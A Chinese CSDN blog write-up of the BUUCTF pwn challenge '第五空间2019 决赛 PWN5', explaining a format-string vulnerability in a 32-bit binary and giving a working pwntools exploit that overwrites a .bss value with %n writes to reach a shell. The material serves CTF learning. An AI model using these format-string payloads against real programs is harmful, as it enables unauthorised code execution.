[第五空间2019 决赛]PWN5

最新推荐文章于 2024-04-01 09:29:25 发布
最新推荐文章于 2024-04-01 09:29:25 发布
阅读量222 收藏 1
点赞数
分类专栏: PWN 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53928256/article/details/127191348
版权

查看程序

image-20221006194538506

得知该程序为i386的32位程序

其次就是该程序开始了Canary、NX保护

首要任务:如何突破Canary保护。(使用printf突破Canary保护)

IDA分析程序

main

int __cdecl main(int a1)
{
  unsigned int v1; // eax
  int result; // eax
  int fd; // [esp+0h] [ebp-84h]
  char nptr[16]; // [esp+4h] [ebp-80h] BYREF
  char buf[100]; // [esp+14h] [ebp-70h] BYREF
  unsigned int v6; // [esp+78h] [ebp-Ch]
  int *v7; // [esp+7Ch] [ebp-8h]

  v7 = &a1;
  v6 = __readgsdword(0x14u);
  setvbuf(stdout, 0, 2, 0);
  v1 = time(0);
  srand(v1);
  fd = open("/dev/urandom", 0);
  read(fd, &dword_804C044, 4u);		//读取4字节的文件内容
  printf("your name:");
  read(0, buf, 0x63u);		//读取0x63字节的输入内容,格式化字符串注入点
  printf("Hello,");
  printf(buf);				//输出刚才输入的内容,考虑格式化字符串漏洞突破Canary
  printf("your passwd:");
  read(0, nptr, 0xFu);		//读取0xf字节的输入内容
  if ( atoi(nptr) == dword_804C044 )	//考虑使之成立
  {
    puts("ok!!");
    system("/bin/sh");
  }
  else
  {
    puts("fail");
  }
  result = 0;
  if ( __readgsdword(0x14u) != v6 )
    sub_80493D0();
  return result;
}

read(fd, &dword_804C044, 4u); 我们跟进dword_804C044变量所处地址;

变量dword_804C044

image-20221007091305124

可以发现dword_804C044变量处于.bss段,并且地址位于0x804C044;

所以我们可以通过格式化字符串漏洞的任意地址修改更改地址0x804C044的值,使if语句成立即可获取权限;

漏洞利用

利用原理

可以通过格式化字符串漏洞修改任意地址内容的利用关键是

%n	//不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。
%10$n //不输出字符,将已经输出的字符个数存储到第10个栈参数对应的地址上

分析检测

通过在输入 buf处输入特殊格式的字符串,来检测栈中参数与存储地址的偏移量

image-20221007093120106

输出结果如图所示

image-20221007093343147

我们可以看出,我们所输入的 aaaa被存储到了第10个栈参数的位置,所以对应的偏移为10

构造注入payload

只需要利用好 %m$n对地址的修改即可

构造payload

payload = p32(0x804C044) + p32(0x804C045) + p32(0x804C046) + p32(0x804C047) + b'%10$n%11$n%12$n%13$n'

先将我们需要修改的地址0x804C044以后后3个地址输入,由于读取内容为4个字节 read(fd, &dword_804C044, 4u);

然后将这4个地址对应的存储位置,通过%m$n将对应地址内容修改为输出的字符个数;

由于输入四个地址,对应输出16个字节,也就是将每个地址(即0x804C044~0x804C047)的内容修改为0x10

偏移量为10,所以我们只需要对第10个到第13个参数对应的内容的地址进行修改即可;

最后构造密码 read(0, nptr, 0xFu);

由于我们将这四个地址(即0x804C044~0x804C047)存储的内容均修改为0x10,所以变量&dword_804C044读出的4个字节的内容即为 0x10101010

故我们读入密码为 str(0x10101010)即可

p.sendline(str(0x10101010))

最终exp如下

exp

from pwn import *

context = 'debug'
p = remote('node4.buuoj.cn',29866)
#p = process('./pwn')

def main():
	payload = p32(0x804C044) + p32(0x804C045) + p32(0x804C046) + p32(0x804C047) + b'%10$n%11$n%12$n%13$n'
	p.sendline(payload)
	p.sendline(str(0x10101010))
	p.interactive()


if __name__ == '__main__':
	main()

image-20221007094232534

C4ndy
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
BUUCTF [第五空间2019 决赛]PWN5
m0_54262894的博客
10-27 203
先checksec,开启了NX保护和Canary保护 也就意味着不能用栈溢出来攻击了 运行一下 放入ida中 查看main函数 我们可以看到只要令atoi(nptr) == dword_804C044就可以拿到权限 但dword_804C044是随机的,所以我们需要将它修改为我们想要的数据 看到了printf(buf); 说明存在格式化字符串漏洞 先计算偏移 我们可以算出偏移为10(从AAAA到41414141) ...
buuctf之[第五空间2019 决赛]PWN5
最新发布
weixin_54452942的博客
04-01 511
简单易懂~
【BUU】[第五空间2019 决赛]PWN5
bzduanlei的博客
07-31 390
一、前置知识 1、%n,不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。 2、如何确定存储格式化字符串的地址是 printf 将要输出的第几个参数? ​ 运行程序后,在格式化字符串漏洞的位置输入AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p,看AAAA的数值对应在格式化字符串的第几个参数。 可以看到,AAAA对应的数值0x41414141在格式化字符串的第10个参数。 二、解题思路 0x01 分析文件 0x02 拖入IDA 3
第五空间2019_决赛_PWN5
z1r0的博客
12-04 226
第五空间2019_决赛_PWN5 查看保护 开了canary和NX 23行有一个格式化字符串漏洞,测出偏移为10,32位程序的话直接用pwntools的工具fmtstr_payload,没有开pie,所以将unk_804c044这里给覆盖成自己想要的值,然后输入password就可以get_shell。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug =
2020年第五空间.zip
07-20
2020年第五空间 比赛逆向 pwn等赛题,除web题外所有赛题均有,含wp,麒麟系统wp。
Pwn】fuzzerinstrospector(首届数字空间安全攻防大赛)
07-16
首届数字空间安全攻防大赛
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF - [第五空间2019 决赛]PWN5
Sakura给爷pwn全场
02-03 236
from pwn import * context(arch='i386',os='linux',log_level='debug',binary='pwn5') io=remote('node3.buuoj.cn',28518) elf=ELF('./pwn5') io.recvuntil('your name:') unk_addr=0x0804C044 payload=p32(unk_addr)+'%10$n' io.sendline(payload) io.recvuntil('your passw
[buuctf][第五空间2019 决赛]PWN5
逆向萌新的博客
06-19 360
[buuctf][第五空间2019 决赛]PWN5
PWN——[第五空间2019 决赛]PWN5
有头发的埼玉
11-14 457
完全通过静态分析得到题解,与网传算法不同
[CTF][第五空间2019 决赛]PWN5 1
凉水的博客
12-09 1065
解题思路 反编译后的源码: srand(__seed); // 生成随机数 iVar1 = open("/dev/urandom",0); read(iVar1,&DAT_0804c044,4); printf("your name:"); // 读取输入 read(0,local_78,99); printf("Hello,"); // 打印输入 printf(local_78); printf("your passwd:"); read(0,loc
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值